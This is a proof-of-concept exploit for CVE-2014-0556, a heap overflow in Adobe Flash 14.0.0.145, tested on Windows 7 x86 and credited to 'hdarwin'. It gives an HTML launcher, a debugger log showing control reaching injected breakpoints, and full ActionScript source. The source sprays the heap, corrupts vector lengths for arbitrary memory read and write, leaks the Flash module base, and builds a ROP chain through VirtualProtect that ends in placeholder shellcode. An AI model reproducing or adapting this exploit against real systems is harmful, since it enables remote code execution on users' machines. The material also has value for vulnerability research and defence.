Adobe Flash 14.0.0.145 copyPixelsToByteArray() Heap Overflow

`/*  
<html>  
<head>  
<title>CVE-2014-0556</title>   
</head>  
<body>  
<object id="swf" width="100%" height="100%" data="NewProject.swf" type="application/x-shockwave-flash"></object><br>  
<button onclick="swf.exploit()">STOP</button>  
</body>  
</html>  
*/  
/*  
(1728.eb0): Break instruction exception - code 80000003 (first chance)  
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984  
eip=08d63048 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202  
08d63048 cc int 3  
1:020> dd esp l4  
08d63048 cccccccc cccccccc cccccccc cccccccc  
1:020> t  
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984  
eip=08d63049 esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202  
08d63049 cc int 3  
1:020> t  
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984  
eip=08d6304a esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202  
08d6304a cc int 3  
1:020> t  
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984  
eip=08d6304b esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202  
08d6304b cc int 3  
1:020> t  
eax=00000001 ebx=00000201 ecx=08d62fe8 edx=76ee70f4 esi=599dd83f edi=59a31984  
eip=08d6304c esp=08d63048 ebp=5a55a3a8 iopl=0 nv up ei pl nz na po nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00200202  
08d6304c cc int 3  
*/  
package   
{  
import flash.events.*  
import flash.media.*  
import flash.display.*  
import flash.geom.*  
import flash.utils.*  
import flash.text.*  
import flash.external.ExternalInterface  
  
public class Main extends Sprite {  
private var i0:uint  
private var i1:uint  
private var i2:uint  
private var i3:uint  
private var str:String = new String("CVE: CVE-2014-0556\nAuthor: hdarwin (@hdarwin89)\nTested on: Win7 SP1 x86 & Flash 14.0.0.145")  
private var ba:Vector.<ByteArray> = new Vector.<ByteArray>(3200)  
private var ob:Vector.<Object> = new Vector.<Object>(6400)  
private var bitmap:BitmapData = new BitmapData(0x100, 4, true, 0xffffffff)  
private var rect:Rectangle = new Rectangle(0, 0, 0x100, 4)  
private var snd:Sound  
private var vector:uint  
private var vtable:uint  
private var flash:uint  
public function Main():void {  
  
for (i0 = 0; i0 < 3200; i0++) {  
ba[i0] = new ByteArray()  
ba[i0].length = 0x2000  
ba[i0].position = 0xfffff000  
}  
  
for (i0 = 0; i0 < 3200; i0++) {  
if (i0 % 2 == 0) ba[i0] = null  
ob[i0 * 2] = new Vector.<uint>(1008)  
ob[i0 * 2 + 1] = new Vector.<uint>(1008)  
}  
  
bitmap.copyPixelsToByteArray(rect, ba[1601])  
  
for (i0 = 0; ; i0++)  
if (ob[i0].length != 1008) break  
  
ob[i0][1024 * 3 - 2] = 0xffffffff  
  
for (i1 = 0; ; i1++) {  
if (i0 == i1) continue  
if (ob[i1].length != 1008) break  
}  
  
ob[i1][0xFFFFFFFE - 1024 * 3] = 0xffffffff  
ob[i1][0xFFFFFFFE - 1024 * 3 + 1] = ob[i0][1024 * 3 - 1]  
ob[i0].fixed = true  
  
for (i2 = 1000; ; i2++) {  
if (ob[i1][0xFFFFFFFF - i2 + 0] == 0 && ob[i1][0xFFFFFFFF - i2 + 10] == 1 && ob[i1][0xFFFFFFFF - i2 + 5] == ob[i1][0xFFFFFFFF - i2 + 15]) {  
vector = ob[i1][0xFFFFFFFF - i2 + 11]  
break  
} else if (ob[i1][i2 + 0] == 0 && ob[i1][i2 + 10] == 1 && ob[i1][i2 + 5] == ob[i1][i2 + 15]) {  
vector = ob[i1][i2 + 11]  
break  
}  
}  
  
snd = new Sound()  
  
for (i2 = 0; i2 < 6400; i2++) {  
if (i2 == i0 || i2 == i1) continue  
ob[i2] = null  
ob[i2] = new Vector.<Object>(1014)  
ob[i2][0] = snd  
ob[i2][1] = snd  
}  
  
for (i2 = 0; ; i2++) {  
if (ob[i0][i2 + 0] == 1014 &&  
ob[i0][i2 + 1] == ob[i0][i2 + 2] &&  
ob[i0][i2 + 3] == 1  
) {  
vtable = read(ob[i0][i2 + 1] - 1)  
flash = vtable - 0x00c3c1e8 // Flash32_14_0_0_145.ocx  
write(ob[i0][i2 + 1] - 1, vector + 0xf54)  
for (i3 = 0; i3 < 1008; i3++) {  
ob[i0][i3] = 0x41414100 | i3  
}  
ob[i0][0] = flash + 0x004d6c50 // POP EBP # RETN  
ob[i0][1] = flash + 0x004d6c50 // skip 4 bytes  
ob[i0][2] = flash + 0x00a21b36 // POP EBX # RETN  
ob[i0][3] = 0x00000201 // 0x00000201  
ob[i0][4] = flash + 0x008ec368 // POP EDX # RETN  
ob[i0][5] = 0x00000040 // 0x00000040  
ob[i0][6] = flash + 0x00691119 // POP ECX # RETN  
ob[i0][7] = vector + 2000 // Writable location  
ob[i0][8] = flash + 0x005986d2 // POP EDI # RETN  
ob[i0][9] = flash + 0x00061984 // RETN (ROP NOP)  
ob[i0][10] = flash + 0x001bf342 // POP ESI # RETN  
ob[i0][11] = flash + 0x0000d83f // JMP [EAX]  
ob[i0][12] = flash + 0x000222b5 // POP EAX # RETN  
ob[i0][13] = flash + 0x00b8a3a8 // ptr to VirtualProtect()  
ob[i0][14] = flash + 0x00785916 // PUSHAD # RETN  
ob[i0][15] = flash + 0x0017b966 // ptr to 'jmp esp'  
ob[i0][16] = 0xcccccccc // shellcode  
ob[i0][17] = 0xcccccccc // shellcode  
ob[i0][18] = 0xcccccccc // shellcode  
ob[i0][19] = 0xcccccccc // shellcode  
ob[i0][979] = flash + 0x0029913A // POP EAX # RETN  
ob[i0][980] = 0x00000f58  
ob[i0][981] = flash + 0x00195558 // PUSH ESP # POP ESI # RETN  
ob[i0][982] = flash + 0x0036B3B2 // SUB ESI,EAX # POP ECX # MOV EAX,ESI # POP ESI # RETN  
ob[i0][985] = flash + 0x0095024c // XCHG EAX,ESP # RETN  
ob[i0][1007] = flash + 0x0095024c // XCHG EAX,ESP # RETN  
break  
}  
}  
  
ob[i1][0xFFFFFFFE - 1024 * 3] = 4096  
ob[i0][1024 * 3 - 2] = 0  
str += flash.toString(16)  
var tf:TextField = new TextField(); tf.width = 800; tf.height = 800; tf.text = str; addChild(tf)  
  
if (ExternalInterface.available) ExternalInterface.addCallback("exploit", exploit)  
}  
  
private function write(addr:uint, data:uint):void {  
ob[i0][(addr - vector) / 4 - 2] = data  
}  
  
private function read(addr:uint):uint {  
return ob[i0][(addr - vector) / 4 - 2]  
}  
  
private function zeroPad(number:String, width:int):String {  
if (number.length < width)  
return "0" + zeroPad(number, width-1)  
return number  
}  
  
public function exploit():void {  
snd.toString()  
}  
}  
}  
`